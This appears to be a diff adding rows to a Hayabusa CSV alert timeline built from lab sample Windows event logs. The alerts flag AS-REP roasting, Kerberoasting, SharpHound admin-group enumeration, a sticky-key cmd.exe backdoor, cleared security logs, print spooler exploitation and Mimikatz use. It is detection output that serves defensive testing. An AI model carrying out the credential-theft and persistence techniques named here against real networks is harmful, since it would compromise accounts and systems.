+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice  :  Service: krbtgt  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0  :  PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54374  :  LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: 192.168.1.100  :  Port: 54375  :  LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54376  :  LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54379  :  LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54388  :  LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54389  :  LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
+2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice  :  Workstation:   :  IP Address: 192.168.1.200  :  Port: 40316  :  LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice  :  Service: krbtgt  :  IP Address: ::ffff:192.168.1.200  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL  :  Service: sql101  :  IP Address: ::ffff:192.168.1.200  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice  :  LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
+2021-05-03 17:16:43.008 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
+2021-05-03 17:16:43.017 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4661-SAM domain users & groups discovery.evtx
+2021-05-03 17:58:25.921 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62173  :  LogonID: 0x88f313a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.942 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62188  :  LogonID: 0x88f3141d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62190  :  LogonID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62194  :  LogonID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62169  :  LogonID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62167  :  LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62170  :  LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62182  :  LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62175  :  LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62178  :  LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62179  :  LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62180  :  LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62184  :  LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62168  :  LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62172  :  LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62183  :  LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62187  :  LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62186  :  LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62189  :  LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62193  :  LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62192  :  LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62191  :  LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62195  :  LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62196  :  LogonID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62197  :  LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62198  :  LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62199  :  LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62200  :  LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62211  :  LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62209  :  LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62219  :  LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62222  :  LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62223  :  LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62210  :  LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62208  :  LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62218  :  LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62216  :  LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62217  :  LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62220  :  LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62221  :  LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62224  :  LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62234  :  LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62235  :  LogonID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.23.9  :  Port: 62236  :  LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: C:\windows\system32\cmd.exe sethc.exe 211  :  Path: C:\Windows\System32\cmd.exe  :  User: OFFSEC\admmig  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
+2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
+2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx
